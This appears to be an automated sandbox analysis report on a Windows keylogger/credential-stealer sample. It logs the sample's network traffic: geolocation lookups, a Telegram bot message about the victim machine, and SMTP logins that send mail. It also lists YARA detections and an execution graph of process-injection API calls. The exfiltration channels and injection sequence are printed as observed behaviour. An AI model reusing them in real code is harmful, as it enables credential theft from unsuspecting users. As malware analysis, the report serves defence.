                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUKagKwuZkmDpkZ3jMxbzVFT19gBOhKUniC1qSglfoaSt08RytDPbSz1EgA1HTgwivwEfEL4kdnhiVDvq7xyYsD%2FPbi8OrKcFspxsKPucDJE5%2BCXDuEzFrUxO%2BvTd5BN99sTFtkg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4068023ac87ce7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4059&min_rtt=1867&rtt_var=2196&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1564006&cwnd=193&unsent_bytes=0&cid=6baf53c4ea861ca1&ts=475&x=0"
                                                                                                                                2024-12-18 16:07:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.649772104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:34 UTC880INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:33 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526822
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88QX9BFuIqpbpEH0rmXSPLrdyWonk35knEsOiSe3FUMU8Oo7%2Bd%2FdY6ore61G2fL5Ne2LD2YhbBtTP%2FmUNsA9XIvv2h4qeBCMpOmgQsy1Io%2FQd%2FNZlpNUrrFh8phOtBlsk4K5mGmY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4068151a1bc324-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1491&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=162&unsent_bytes=0&cid=ab6f82b3df7fd978&ts=456&x=0"
                                                                                                                                2024-12-18 16:07:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.649783104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:37 UTC884INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:37 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526826
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dbcJPAzF9Sgt7JONS1j7IXyVBk6cFBA6LN%2F4%2FvZUku7RYO2LgL3vxiwQ1E4Q%2F22fCXETVFDyyX3lggY6HY7NtfvoBc36xB7CKIU%2FiJ88%2BohIIDV3OJNA1oi%2BIbMMPN74XC%2FInmP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f406828986e43a3-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1604&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1689814&cwnd=223&unsent_bytes=0&cid=41ab02066affe1b2&ts=461&x=0"
                                                                                                                                2024-12-18 16:07:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.649792104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:40 UTC882INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:40 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526829
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1KrkOHxe5ZZpbHG31mA0U9v9QToW%2B6YlcXtBxC8%2BirEuoqJUDo1nKY87340noPvkCDmOo7d9E%2B2bci4W2nbWCvVaiTEhWLcUvPO2xYK5jVo8%2FHI276%2B6yyECIOCxMY%2FnsiKCEzu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f40683b691c4346-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1579&rtt_var=643&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1638608&cwnd=252&unsent_bytes=0&cid=ae9fad53d326a91b&ts=456&x=0"
                                                                                                                                2024-12-18 16:07:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.649798104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:43 UTC878INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:43 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526832
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBzRvkLhICNx%2F032gtnCROrSEVXOIrEk2uQiwjjZmgZf%2FBmzwNBs0ylFbWPnYSeo5sbBFkWs6a4qwHN%2Bh2Bgu9jO6oH%2FqQ9Lbd9Mi3BkmK63mA8y3toSP7KWDlWZ5nuQDImpKbGd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f40684e2b794252-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1589&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1798029&cwnd=235&unsent_bytes=0&cid=058da556460071d1&ts=467&x=0"
                                                                                                                                2024-12-18 16:07:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.649803149.154.167.2204437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:44 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                Host: api.telegram.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:45 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:45 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 55
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-18 16:07:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                Dec 18, 2024 17:07:52.417762995 CET58749824172.65.255.143192.168.2.6220 ESMTP smtp.hostinger.com
                                                                                                                                Dec 18, 2024 17:07:52.418638945 CET49824587192.168.2.6172.65.255.143EHLO 377142
                                                                                                                                Dec 18, 2024 17:07:52.809969902 CET58749824172.65.255.143192.168.2.6250-smtp.hostinger.com
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 48811212
                                                                                                                                250-ETRN
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                                250-ENHANCEDSTATUSCODES
                                                                                                                                250-8BITMIME
                                                                                                                                250-DSN
                                                                                                                                250 CHUNKING
                                                                                                                                Dec 18, 2024 17:07:52.811453104 CET49824587192.168.2.6172.65.255.143AUTH login b3V0QHBsaHQzNjUuY29t
                                                                                                                                Dec 18, 2024 17:07:53.203979969 CET58749824172.65.255.143192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                                Dec 18, 2024 17:07:53.657196045 CET58749824172.65.255.143192.168.2.6235 2.7.0 Authentication successful
                                                                                                                                Dec 18, 2024 17:07:53.657460928 CET49824587192.168.2.6172.65.255.143MAIL FROM:<out@plht365.com>
                                                                                                                                Dec 18, 2024 17:07:54.056657076 CET58749824172.65.255.143192.168.2.6250 2.1.0 Ok
                                                                                                                                Dec 18, 2024 17:07:54.056911945 CET49824587192.168.2.6172.65.255.143RCPT TO:<inside@plht365.com>
                                                                                                                                Dec 18, 2024 17:07:54.470879078 CET58749824172.65.255.143192.168.2.6250 2.1.5 Ok
                                                                                                                                Dec 18, 2024 17:07:54.471097946 CET49824587192.168.2.6172.65.255.143DATA
                                                                                                                                Dec 18, 2024 17:07:54.864589930 CET58749824172.65.255.143192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                                                                                                Dec 18, 2024 17:07:54.865567923 CET49824587192.168.2.6172.65.255.143.
                                                                                                                                Dec 18, 2024 17:07:55.443845987 CET58749824172.65.255.143192.168.2.6250 2.0.0 Ok: queued as 4YCz9Q1yYsz6nv74
                                                                                                                                Dec 18, 2024 17:07:56.951675892 CET49824587192.168.2.6172.65.255.143QUIT
                                                                                                                                Dec 18, 2024 17:07:57.344615936 CET58749824172.65.255.143192.168.2.6221 2.0.0 Bye
                                                                                                                                Dec 18, 2024 17:07:58.676038980 CET58749838172.65.255.143192.168.2.6220 ESMTP smtp.hostinger.com
                                                                                                                                Dec 18, 2024 17:07:58.676296949 CET49838587192.168.2.6172.65.255.143EHLO 377142
                                                                                                                                Dec 18, 2024 17:07:59.073887110 CET58749838172.65.255.143192.168.2.6250-smtp.hostinger.com
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 48811212
                                                                                                                                250-ETRN
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                                250-ENHANCEDSTATUSCODES
                                                                                                                                250-8BITMIME
                                                                                                                                250-DSN
                                                                                                                                250 CHUNKING
                                                                                                                                Dec 18, 2024 17:07:59.074214935 CET49838587192.168.2.6172.65.255.143AUTH login b3V0QHBsaHQzNjUuY29t
                                                                                                                                Dec 18, 2024 17:07:59.466568947 CET58749838172.65.255.143192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                                Dec 18, 2024 17:07:59.888154030 CET58749838172.65.255.143192.168.2.6235 2.7.0 Authentication successful
                                                                                                                                Dec 18, 2024 17:07:59.896745920 CET49838587192.168.2.6172.65.255.143MAIL FROM:<out@plht365.com>
                                                                                                                                Dec 18, 2024 17:08:00.293081999 CET58749838172.65.255.143192.168.2.6250 2.1.0 Ok
                                                                                                                                Dec 18, 2024 17:08:00.293371916 CET49838587192.168.2.6172.65.255.143RCPT TO:<inside@plht365.com>
                                                                                                                                Dec 18, 2024 17:08:00.713082075 CET58749838172.65.255.143192.168.2.6250 2.1.5 Ok
                                                                                                                                Dec 18, 2024 17:08:00.713325024 CET49838587192.168.2.6172.65.255.143DATA
                                                                                                                                Dec 18, 2024 17:08:01.122169018 CET58749838172.65.255.143192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                                                                                                Dec 18, 2024 17:08:01.122653008 CET49838587192.168.2.6172.65.255.143.
                                                                                                                                Dec 18, 2024 17:08:01.729691982 CET58749838172.65.255.143192.168.2.6250 2.0.0 Ok: queued as 4YCz9X3gv4zFwV3Z
                                                                                                                                Dec 18, 2024 17:08:21.750197887 CET58749838172.65.255.143192.168.2.6421 4.4.2 smtp.hostinger.com Error: timeout exceeded
                                                                                                                                Dec 18, 2024 17:09:30.754642963 CET49838587192.168.2.6172.65.255.143QUIT

                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:1
                                                                                                                                Start time:11:07:12
                                                                                                                                Start date:18/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\_Company.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\_Company.exe"
                                                                                                                                Imagebase:0xa50000
                                                                                                                                File size:486'400 bytes
                                                                                                                                MD5 hash:AFF56992589DFB76554EA1416C3E99D1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Target ID:2
                                                                                                                                Start time:11:07:13
                                                                                                                                Start date:18/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\_Company.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\_Company.exe"
                                                                                                                                Imagebase:0xaf0000
                                                                                                                                File size:486'400 bytes
                                                                                                                                MD5 hash:AFF56992589DFB76554EA1416C3E99D1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:18.9%
                                                                                                                                  Total number of Nodes:243
                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                  execution_graph 36839 1284668 36840 128467a 36839->36840 36841 1284686 36840->36841 36845 1284779 36840->36845 36850 1283e10 36841->36850 36843 12846a5 36846 128479d 36845->36846 36854 1284878 36846->36854 36858 1284888 36846->36858 36851 1283e1b 36850->36851 36866 1285c64 36851->36866 36853 1286fcf 36853->36843 36855 12848af 36854->36855 36857 128498c 36855->36857 36862 1284248 36855->36862 36860 12848af 36858->36860 36859 128498c 36859->36859 36860->36859 36861 1284248 CreateActCtxA 36860->36861 36861->36859 36863 1285918 CreateActCtxA 36862->36863 36865 12859db 36863->36865 36867 1285c6f 36866->36867 36870 1285c84 36867->36870 36869 1287085 36869->36853 36871 1285c8f 36870->36871 36874 1285cb4 36871->36874 36873 1287162 36873->36869 36875 1285cbf 36874->36875 36878 1285ce4 36875->36878 36877 1287265 36877->36873 36880 1285cef 36878->36880 36879 12885a9 36879->36877 36880->36879 36883 128cd0f 36880->36883 36888 128cd00 36880->36888 36884 128cd31 36883->36884 36885 128cd55 36884->36885 36893 128ce7d 36884->36893 36897 128cec0 36884->36897 36885->36879 36889 128cd6c 36888->36889 36890 128cd98 36889->36890 36891 128ce7d 3 API calls 36889->36891 36892 128cec0 3 API calls 36889->36892 36890->36879 36891->36890 36892->36890 36895 128ceec 36893->36895 36894 128cf07 36894->36885 36895->36894 36901 128b720 36895->36901 36899 128cecd 36897->36899 36898 128cf07 36898->36885 36899->36898 36900 128b720 3 API calls 36899->36900 36900->36898 36902 128b72b 36901->36902 36904 128dc18 36902->36904 36905 128d024 36902->36905 36904->36904 36906 128d02f 36905->36906 36907 1285ce4 3 API calls 36906->36907 36908 128dc87 36907->36908 36909 128dc96 36908->36909 36915 128dcf8 36908->36915 36919 128dd00 36908->36919 36923 128f9f0 36909->36923 36928 128fa08 36909->36928 36910 128dcc1 36910->36904 36916 128dd2e 36915->36916 36917 128ddfa KiUserCallbackDispatcher 36916->36917 36918 128ddff 36916->36918 36917->36918 36920 128dd2e 36919->36920 36921 128ddfa KiUserCallbackDispatcher 36920->36921 36922 128ddff 36920->36922 36921->36922 36924 128fa45 36923->36924 36925 128fa39 36923->36925 36924->36910 36925->36924 36926 53509b0 CreateWindowExW 36925->36926 36927 53509c0 CreateWindowExW 36925->36927 36926->36924 36927->36924 36929 128fa39 36928->36929 36930 128fa45 36928->36930 36929->36930 36931 53509b0 CreateWindowExW 36929->36931 36932 53509c0 CreateWindowExW 36929->36932 36930->36910 36931->36930 36932->36930 37113 128d3d8 37114 128d41e GetCurrentProcess 37113->37114 37116 128d469 37114->37116 37117 128d470 GetCurrentThread 37114->37117 37116->37117 37118 128d4ad GetCurrentProcess 37117->37118 37119 128d4a6 37117->37119 37120 128d4e3 37118->37120 37119->37118 37121 128d50b GetCurrentThreadId 37120->37121 37122 128d53c 37121->37122 36933 535beb0 36935 535beca 36933->36935 36934 535bf1a 36935->36934 36938 535bf70 36935->36938 36964 535bf60 36935->36964 36940 535bfa3 36938->36940 36990 535ab94 36940->36990 36941 535c17a 36942 535aba0 Wow64GetThreadContext 36941->36942 36943 535c274 36941->36943 36942->36943 36944 535abb8 ReadProcessMemory 36943->36944 36945 535c354 36944->36945 36954 535bd40 VirtualAllocEx 36945->36954 36955 535bd38 VirtualAllocEx 36945->36955 36946 535c471 36952 535bc50 WriteProcessMemory 36946->36952 36953 535bc48 WriteProcessMemory 36946->36953 36947 535c750 36958 535bc50 WriteProcessMemory 36947->36958 36959 535bc48 WriteProcessMemory 36947->36959 36948 535c555 36948->36947 36956 535bc50 WriteProcessMemory 36948->36956 36957 535bc48 WriteProcessMemory 